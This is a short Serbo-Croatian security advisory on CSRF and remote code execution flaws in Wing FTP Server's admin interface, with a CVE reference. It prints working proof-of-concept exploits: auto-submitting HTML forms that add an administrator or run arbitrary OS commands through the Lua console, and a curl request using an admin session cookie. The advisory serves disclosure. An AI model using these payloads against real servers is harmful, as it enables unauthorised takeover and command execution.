Wing FTP Server CSRF ranjivost i ranjivost na udaljeno izvršavanje koda
Veliki broj funkcionalnost kao dodavanje i brosanje domenskih administratora, regularnih korisnika, pokretanje i zaustavljanje servera ili kreiranje i brisanje FTP domena su ranjivi na CSRF.
Proof of concept za dodavanje domenskog administratora :
<html>
<body>
<form action=”http://<server address>:5466/admin_addadmin.html” method=”POST”>
<input type=”hidden” name=”admin” value=”{"username":"admin2","password":"admin2","oldpassword":"","readonly":0,"domainadmin":1,"domainlist":"test","mydirectory":"","ipmasks":[]}” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Remote code execution ranjivost admin interfejsa se može eksploatisati koristenjem LUA CLI i gore navedene CSRF ranjivosti ili putem autentifikovanog administratora za izvršavanje komandi na nivou privilegija web servera.
Proof of concept za napad putem CSRF :
<html>
<body>
<form action=”http://<server address>:5466/admin_lua_script.html” method=”POST” enctype=”text/plain”>
<input type=”hidden” name=”command” value=”os.execute("<any OS command here>")” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Proof of concept za napad putem autentifikovanog administratora :
1) Koristenje LUA konzolnog interfejsa za direktno izvršavanje komande os.execute("<OS komanda>").
2) POST koristeći CURL sa autentikovanim kukijem:
curl -i -s -k -X "POST" -b "admin_lang=english; UIDADMIN=b8b208e2239f462c11641eaa10cde7b0" –data-binary $"command=os.execute("cmd.exe")"
"http://<server address>:5466/admin_lua_script.html"
Parametar: “command”
Parametarski tip : POST
Bilo koja OS komanda se može izvršiti putem os.execute(….).
Verzija 4.4.7 rjesila je CSRF problem ali ne i RCE putem autentikovanog administratora.
Izvor:http://www.securityfocus.com
Značaj ranjivosti:VAŽNO
Platforma:Linux
CVE oznaka:CVE-2015-4107,4018